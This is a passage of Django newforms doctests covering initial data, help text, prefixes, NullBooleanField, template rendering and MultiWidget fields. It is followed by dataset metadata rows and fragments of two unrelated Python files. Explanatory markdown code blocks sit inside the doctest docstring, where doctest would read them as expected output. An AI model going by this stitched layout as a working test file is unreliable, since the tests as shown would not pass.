possible to supply callables as initial data.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
We need to define functions that get called later.
>>> def initial_django():
... return 'django'
>>> def initial_stephane():
... return 'stephane'
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
The 'initial' parameter is meaningless if you pass data.
>>> p = UserRegistration({}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
A callable 'initial' value is *not* used as a fallback if data is not provided.
In this example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'}, initial={'username': initial_django})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
If a Form defines 'initial' *and* 'initial' is passed as a parameter to Form(),
then the latter takes precedence.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial=initial_django)
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(initial={'username': initial_stephane}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="stephane" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
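The practical payoff of callable initial data is deferred evaluation: the
value is computed when the form asks for it, not when the module is imported.
A minimal sketch of the difference:

```python
import datetime

# Evaluated once, at definition time -- every render would show the
# value frozen at import.
frozen = datetime.date.today()

# Passed as a callable -- the form stores the function itself and
# invokes it at render time, so each render gets a fresh value.
def current_date():
    return datetime.date.today()

initial = current_date
print(callable(initial))                    # True
print(initial() == datetime.date.today())   # True
```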
# Help text ###################################################################
You can specify descriptive text for a field by using the 'help_text' argument
to a Field class. This help text is displayed when a Form is rendered.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='e.g., user@example.com')
... password = CharField(widget=PasswordInput, help_text='Choose wisely.')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</li>
<li>Password: <input type="password" name="password" /> Choose wisely.</li>
>>> print p.as_p()
<p>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</p>
<p>Password: <input type="password" name="password" /> Choose wisely.</p>
>>> print p.as_table()
<tr><th>Username:</th><td><input type="text" name="username" maxlength="10" /><br />e.g., user@example.com</td></tr>
<tr><th>Password:</th><td><input type="password" name="password" /><br />Choose wisely.</td></tr>
The help text is displayed whether or not data is provided for the form.
>>> p = UserRegistration({'username': u'foo'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /> e.g., user@example.com</li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /> Choose wisely.</li>
help_text is not displayed for hidden fields. It can be used for documentation
purposes, though.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='e.g., user@example.com')
... password = CharField(widget=PasswordInput)
... next = CharField(widget=HiddenInput, initial='/', help_text='Redirect destination')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</li>
<li>Password: <input type="password" name="password" /><input type="hidden" name="next" value="/" /></li>
Help text can include arbitrary Unicode characters.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='ŠĐĆŽćžšđ')
>>> p = UserRegistration(auto_id=False)
>>> p.as_ul()
u'<li>Username: <input type="text" name="username" maxlength="10" /> \u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</li>'
# Subclassing forms ###########################################################
You can subclass a Form to add fields. The resulting form subclass will have
all of the fields of the parent Form, plus whichever fields you define in the
subclass.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> class Musician(Person):
... instrument = CharField()
>>> p = Person(auto_id=False)
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
>>> m = Musician(auto_id=False)
>>> print m.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
<li>Instrument: <input type="text" name="instrument" /></li>
Yes, you can subclass multiple forms. The fields are added in the order in
which the parent classes are listed.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> class Instrument(Form):
... instrument = CharField()
>>> class Beatle(Person, Instrument):
... haircut_type = CharField()
>>> b = Beatle(auto_id=False)
>>> print b.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
<li>Instrument: <input type="text" name="instrument" /></li>
<li>Haircut type: <input type="text" name="haircut_type" /></li>
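Declaration order survives subclassing because each field instance records a
global creation counter when it is instantiated, and the collected fields are
sorted by it. A toy sketch of that mechanism (names are illustrative, not
Django's internals verbatim):

```python
import itertools

_creation_counter = itertools.count()

class TinyField:
    # Each instance remembers when it was created, so a collector (in
    # Django's case, the Form metaclass) can sort fields gathered from
    # several classes back into declaration order.
    def __init__(self):
        self.creation_counter = next(_creation_counter)

a, b, c = TinyField(), TinyField(), TinyField()
fields = sorted([c, a, b], key=lambda f: f.creation_counter)
print(fields == [a, b, c])  # True
```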
# Forms with prefixes #########################################################
Sometimes it's necessary to display multiple forms, or multiple copies of the
same form, on a single HTML page. We can accomplish this with form prefixes.
Pass the keyword argument 'prefix' to the Form constructor to use this feature.
This value will be prepended to each HTML form field name. One way to think
about this is "namespaces for HTML forms". Notice that in the data argument,
each field's key has the prefix, in this case 'person1', prepended to the
actual field name.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> data = {
... 'person1-first_name': u'John',
... 'person1-last_name': u'Lennon',
... 'person1-birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='person1')
>>> print p.as_ul()
<li><label for="id_person1-first_name">First name:</label> <input type="text" name="person1-first_name" value="John" id="id_person1-first_name" /></li>
<li><label for="id_person1-last_name">Last name:</label> <input type="text" name="person1-last_name" value="Lennon" id="id_person1-last_name" /></li>
<li><label for="id_person1-birthday">Birthday:</label> <input type="text" name="person1-birthday" value="1940-10-9" id="id_person1-birthday" /></li>
>>> print p['first_name']
<input type="text" name="person1-first_name" value="John" id="id_person1-first_name" />
>>> print p['last_name']
<input type="text" name="person1-last_name" value="Lennon" id="id_person1-last_name" />
>>> print p['birthday']
<input type="text" name="person1-birthday" value="1940-10-9" id="id_person1-birthday" />
>>> p.errors
{}
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
Let's try submitting some bad data to make sure form.errors and field.errors
work as expected.
>>> data = {
... 'person1-first_name': u'',
... 'person1-last_name': u'',
... 'person1-birthday': u''
... }
>>> p = Person(data, prefix='person1')
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p['first_name'].errors
[u'This field is required.']
>>> p['person1-first_name'].errors
Traceback (most recent call last):
...
KeyError: "Key 'person1-first_name' not found in Form"
In this example, the data doesn't have a prefix, but the form requires it, so
the form doesn't "see" the fields.
>>> data = {
... 'first_name': u'John',
... 'last_name': u'Lennon',
... 'birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='person1')
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
With prefixes, a single data dictionary can hold data for multiple instances
of the same form.
>>> data = {
... 'person1-first_name': u'John',
... 'person1-last_name': u'Lennon',
... 'person1-birthday': u'1940-10-9',
... 'person2-first_name': u'Jim',
... 'person2-last_name': u'Morrison',
... 'person2-birthday': u'1943-12-8'
... }
>>> p1 = Person(data, prefix='person1')
>>> p1.is_valid()
True
>>> p1.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
>>> p2 = Person(data, prefix='person2')
>>> p2.is_valid()
True
>>> p2.cleaned_data
{'first_name': u'Jim', 'last_name': u'Morrison', 'birthday': datetime.date(1943, 12, 8)}
By default, forms append a hyphen between the prefix and the field name, but a
form can alter that behavior by implementing the add_prefix() method. This
method takes a field name and returns the prefixed field name, according to
self.prefix.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
... def add_prefix(self, field_name):
... return self.prefix and '%s-prefix-%s' % (self.prefix, field_name) or field_name
>>> p = Person(prefix='foo')
>>> print p.as_ul()
<li><label for="id_foo-prefix-first_name">First name:</label> <input type="text" name="foo-prefix-first_name" id="id_foo-prefix-first_name" /></li>
<li><label for="id_foo-prefix-last_name">Last name:</label> <input type="text" name="foo-prefix-last_name" id="id_foo-prefix-last_name" /></li>
<li><label for="id_foo-prefix-birthday">Birthday:</label> <input type="text" name="foo-prefix-birthday" id="id_foo-prefix-birthday" /></li>
>>> data = {
... 'foo-prefix-first_name': u'John',
... 'foo-prefix-last_name': u'Lennon',
... 'foo-prefix-birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='foo')
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
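The default behavior that add_prefix() overrides can be sketched as a simple
hyphen join (a standalone illustration, not Django's method itself):

```python
def default_add_prefix(prefix, field_name):
    # Hyphen-join, matching the 'person1-first_name' keys used above;
    # with no prefix, the field name passes through untouched.
    return '%s-%s' % (prefix, field_name) if prefix else field_name

print(default_add_prefix('person1', 'first_name'))  # person1-first_name
print(default_add_prefix(None, 'first_name'))       # first_name
```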
# Forms with NullBooleanFields ################################################
NullBooleanField is a bit of a special case because its presentation (widget)
is different from its data. This is handled transparently, though.
>>> class Person(Form):
... name = CharField()
... is_cool = NullBooleanField()
>>> p = Person({'name': u'Joe'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'1'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'2'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'3'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': True}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': False}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
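The value translation the examples above exercise can be sketched as a small
mapping function (a simplification for illustration, not the widget's actual
code): '2' or True means Yes, '3' or False means No, and anything else falls
back to None, i.e. "Unknown".

```python
def null_boolean_from_data(value):
    # '2'/True -> True, '3'/False -> False; everything else (including
    # '1' and a missing value) -> None, rendered as "Unknown".
    if value in (True, u'2'):
        return True
    if value in (False, u'3'):
        return False
    return None

print(null_boolean_from_data(u'2'))  # True
print(null_boolean_from_data(u'1'))  # None
```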
# Basic form processing in a view #############################################
>>> from django.template import Template, Context
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
>>> def my_function(method, post_data):
... if method == 'POST':
... form = UserRegistration(post_data, auto_id=False)
... else:
... form = UserRegistration(auto_id=False)
... if form.is_valid():
... return 'VALID: %r' % form.cleaned_data
... t = Template('<form action="" method="post">\n<table>\n{{ form }}\n</table>\n<input type="submit" />\n</form>')
... return t.render(Context({'form': form}))
Case 1: GET (an empty form, with no errors).
>>> print my_function('GET', {})
<form action="" method="post">
<table>
<tr><th>Username:</th><td><input type="text" name="username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" /></td></tr>
</table>
<input type="submit" />
</form>
Case 2: POST with erroneous data (a redisplayed form, with errors).
>>> print my_function('POST', {'username': 'this-is-a-long-username', 'password1': 'foo', 'password2': 'bar'})
<form action="" method="post">
<table>
<tr><td colspan="2"><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></td></tr>
<tr><th>Username:</th><td><ul class="errorlist"><li>Ensure this value has at most 10 characters.</li></ul><input type="text" name="username" value="this-is-a-long-username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" value="foo" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" value="bar" /></td></tr>
</table>
<input type="submit" />
</form>
Case 3: POST with valid data (the success message).
>>> print my_function('POST', {'username': 'adrian', 'password1': 'secret', 'password2': 'secret'})
VALID: {'username': u'adrian', 'password1': u'secret', 'password2': u'secret'}
# Some ideas for using templates with forms ###################################
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text="Good luck picking a username that doesn't already exist.")
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
You have full flexibility in displaying form fields in a template. Just pass a
Form instance to the template, and use "dot" access to refer to individual
fields. Note, however, that this flexibility comes with the responsibility of
displaying all the errors, including any that might not be associated with a
particular field.
>>> t = Template('''<form action="">
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" /></label></p>
<p><label>Password (again): <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
>>> print t.render(Context({'form': UserRegistration({'username': 'django'}, auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<ul class="errorlist"><li>This field is required.</li></ul><p><label>Password: <input type="password" name="password1" /></label></p>
<ul class="errorlist"><li>This field is required.</li></ul><p><label>Password (again): <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
Use form.[field].label to output a field's label. You can specify the label for
a field by using the 'label' argument to a Field class. If you don't specify
'label', Django will use the field name with underscores converted to spaces,
and the initial letter capitalized.
>>> t = Template('''<form action="">
... <p><label>{{ form.username.label }}: {{ form.username }}</label></p>
... <p><label>{{ form.password1.label }}: {{ form.password1 }}</label></p>
... <p><label>{{ form.password2.label }}: {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p><label>Username: <input type="text" name="username" maxlength="10" /></label></p>
<p><label>Password1: <input type="password" name="password1" /></label></p>
<p><label>Password2: <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
Use form.[field].label_tag to output a field's label with a <label> tag
wrapped around it, but *only* if the given field has an "id" attribute.
Recall from above that passing the "auto_id" argument to a Form gives each
field an "id" attribute.
>>> t = Template('''<form action="">
... <p>{{ form.username.label_tag }}: {{ form.username }}</p>
... <p>{{ form.password1.label_tag }}: {{ form.password1 }}</p>
... <p>{{ form.password2.label_tag }}: {{ form.password2 }}</p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p>Username: <input type="text" name="username" maxlength="10" /></p>
<p>Password1: <input type="password" name="password1" /></p>
<p>Password2: <input type="password" name="password2" /></p>
<input type="submit" />
</form>
>>> print t.render(Context({'form': UserRegistration(auto_id='id_%s')}))
<form action="">
<p><label for="id_username">Username</label>: <input id="id_username" type="text" name="username" maxlength="10" /></p>
<p><label for="id_password1">Password1</label>: <input type="password" name="password1" id="id_password1" /></p>
<p><label for="id_password2">Password2</label>: <input type="password" name="password2" id="id_password2" /></p>
<input type="submit" />
</form>
Use form.[field].help_text to output a field's help text. If the given field
does not have help text, nothing will be output.
>>> t = Template('''<form action="">
... <p>{{ form.username.label_tag }}: {{ form.username }}<br />{{ form.username.help_text }}</p>
... <p>{{ form.password1.label_tag }}: {{ form.password1 }}</p>
... <p>{{ form.password2.label_tag }}: {{ form.password2 }}</p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p>Username: <input type="text" name="username" maxlength="10" /><br />Good luck picking a username that doesn't already exist.</p>
<p>Password1: <input type="password" name="password1" /></p>
<p>Password2: <input type="password" name="password2" /></p>
<input type="submit" />
</form>
>>> Template('{{ form.password1.help_text }}').render(Context({'form': UserRegistration(auto_id=False)}))
''
The label_tag() method takes an optional attrs argument: a dictionary of HTML
attributes to add to the <label> tag.
>>> f = UserRegistration(auto_id='id_%s')
>>> for bf in f:
... print bf.label_tag(attrs={'class': 'pretty'})
<label for="id_username" class="pretty">Username</label>
<label for="id_password1" class="pretty">Password1</label>
<label for="id_password2" class="pretty">Password2</label>
To display the errors that aren't associated with a particular field -- e.g.,
the errors caused by Form.clean() -- use {{ form.non_field_errors }} in the
template. If used on its own, it is displayed as a <ul> (or an empty string, if
the list of errors is empty). You can also use it in {% if %} statements.
>>> t = Template('''<form action="">
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration({'username': 'django', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" value="foo" /></label></p>
<p><label>Password (again): <input type="password" name="password2" value="bar" /></label></p>
<input type="submit" />
</form>
>>> t = Template('''<form action="">
... {{ form.non_field_errors }}
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration({'username': 'django', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)}))
<form action="">
<ul class="errorlist"><li>Please make sure your passwords match.</li></ul>
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" value="foo" /></label></p>
<p><label>Password (again): <input type="password" name="password2" value="bar" /></label></p>
<input type="submit" />
</form>
###############
# Extra stuff #
###############
The newforms library comes with some extra, higher-level Field and Widget
classes that demonstrate some of the library's abilities.
# SelectDateWidget ############################################################
>>> from django.newforms.extras import SelectDateWidget
>>> w = SelectDateWidget(years=('2007','2008','2009','2010','2011','2012','2013','2014','2015','2016'))
>>> print w.render('mydate', '')
<select name="mydate_month">
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year">
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
>>> w.render('mydate', None) == w.render('mydate', '')
True
>>> print w.render('mydate', '2010-04-15')
<select name="mydate_month">
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4" selected="selected">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15" selected="selected">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year">
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
# MultiWidget and MultiValueField #############################################
# MultiWidgets are widgets composed of other widgets. They are usually
# combined with MultiValueFields - fields that are composed of other fields.
# MultiWidgets can themselves be composed of other MultiWidgets.
# SplitDateTimeWidget is one example of a MultiWidget.
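The decompress/compress pair defined below is just string packing and unpacking; stripped of the Django machinery, the round trip looks like this (a plain-Python sketch, not part of the test suite):

```python
import datetime
import time

def decompress(value):
    # Split 'text,choices,datetime' into its three components.
    if value:
        text, choices, stamp = value.split(',')
        dt = datetime.datetime(*time.strptime(stamp, "%Y-%m-%d %H:%M:%S")[0:6])
        return [text, choices, dt]
    return [None, None, None]

def compress(data_list):
    # Re-join the components into the single stored string.
    if data_list:
        return '%s,%s,%s' % (data_list[0], ''.join(data_list[1]), data_list[2])
    return None

packed = 'some text,JP,2007-04-25 06:24:00'
text, choices, dt = decompress(packed)
assert compress([text, list(choices), dt]) == packed
```

The doctests below exercise exactly this symmetry through the widget and field classes.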
>>> class ComplexMultiWidget(MultiWidget):
... def __init__(self, attrs=None):
... widgets = (
... TextInput(),
... SelectMultiple(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
... SplitDateTimeWidget(),
... )
... super(ComplexMultiWidget, self).__init__(widgets, attrs)
...
... def decompress(self, value):
... if value:
... data = value.split(',')
... return [data[0], data[1], datetime.datetime(*time.strptime(data[2], "%Y-%m-%d %H:%M:%S")[0:6])]
... return [None, None, None]
... def format_output(self, rendered_widgets):
... return u'\n'.join(rendered_widgets)
>>> w = ComplexMultiWidget()
>>> print w.render('name', 'some text,JP,2007-04-25 06:24:00')
<input type="text" name="name_0" value="some text" />
<select multiple="multiple" name="name_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="name_2_0" value="2007-04-25" /><input type="text" name="name_2_1" value="06:24:00" />
>>> class ComplexField(MultiValueField):
... def __init__(self, required=True, widget=None, label=None, initial=None):
... fields = (
... CharField(),
... MultipleChoiceField(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
... SplitDateTimeField()
... )
... super(ComplexField, self).__init__(fields, required, widget, label, initial)
...
... def compress(self, data_list):
... if data_list:
... return '%s,%s,%s' % (data_list[0],''.join(data_list[1]),data_list[2])
... return None
>>> f = ComplexField(widget=w)
>>> f.clean(['some text', ['J','P'], ['2007-04-25','6:24:00']])
u'some text,JP,2007-04-25 06:24:00'
>>> f.clean(['some text',['X'], ['2007-04-25','6:24:00']])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. X is not one of the available choices.']
# If insufficient data is provided, None is substituted
>>> f.clean(['some text',['JP']])
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> class ComplexFieldForm(Form):
... field1 = ComplexField(widget=w)
>>> f = ComplexFieldForm()
>>> print f
<tr><th><label for="id_field1_0">Field1:</label></th><td><input type="text" name="field1_0" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" id="id_field1_2_0" /><input type="text" name="field1_2_1" id="id_field1_2_1" /></td></tr>
>>> f = ComplexFieldForm({'field1_0':'some text','field1_1':['J','P'], 'field1_2_0':'2007-04-25', 'field1_2_1':'06:24:00'})
>>> print f
<tr><th><label for="id_field1_0">Field1:</label></th><td><input type="text" name="field1_0" value="some text" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" value="2007-04-25" id="id_field1_2_0" /><input type="text" name="field1_2_1" value="06:24:00" id="id_field1_2_1" /></td></tr>
>>> f.cleaned_data
{'field1': u'some text,JP,2007-04-25 06:24:00'}
#################################
# Tests of underlying functions #
#################################
# smart_unicode tests
>>> from django.utils.encoding import smart_unicode
>>> class Test:
... def __str__(self):
... return 'ŠĐĆŽćžšđ'
>>> class TestU:
... def __str__(self):
... return 'Foo'
... def __unicode__(self):
... return u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(Test())
u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(TestU())
u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(1)
u'1'
>>> smart_unicode('foo')
u'foo'
# flatatt tests
>>> from django.newforms.util import flatatt
>>> flatatt({'id': "header"})
u' id="header"'
>>> flatatt({'class': "news", 'title': "Read this"})
u' class="news" title="Read this"'
>>> flatatt({})
u''
####################################
# Test accessing errors in clean() #
####################################
>>> class UserForm(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
... def clean(self):
... data = self.cleaned_data
... if not self.errors:
... data['username'] = data['username'].lower()
... return data
>>> f = UserForm({'username': 'SirRobin', 'password': 'blue'})
>>> f.is_valid()
True
>>> f.cleaned_data['username']
u'sirrobin'
"""
__test__ = {
'form_tests': form_tests,
'localflavor': localflavor_tests,
'regressions': regression_tests,
}
if __name__ == "__main__":
import doctest
doctest.testmod()
48604cf6fc1a429122dce7274c6f970884dc015d | 168 | py | Python | pandemic_analyzer/pandemic_analyzer/__init__.py | deselmo/PandemicSimulator | 8752e6ce50cc0a61084c265322049bc46d5893ec | ["MIT"]
from pandemic_analyzer.analyzer_epochs import AnalyzerEpochs
from pandemic_analyzer.analyzer_graph import AnalyzerGraph
from pandemic_analyzer.analyzer import Analyzer
48707771c3b04eeef27d1c6fb8111ec941a87182 | 5,188 | py | Python | script_bests.py | brunoggregorio/DCNN-feature-extraction | 08b6bc751612f98a147afbe55051d3c3aec3693e | ["Apache-2.0"]
"""!
Run dcnn_mtm on each video of the dataset with the best-performing
configuration (DCNN model, number of templates, and binary threshold)
found for that video.
"""
import numpy as np
from dcnn_mtm import dcnn_mtm
# Create global variables
# =======================
base_path = "/home/brunoggregorio/Workspace/data/dataset/"
min_side = 1000
max_side = 1400
thres_feature = 0.9
retained_value = 0.1
radius_feature = 5.0
pyramid_levels = 1
thres_ecc = 0.62
constant = -25.5
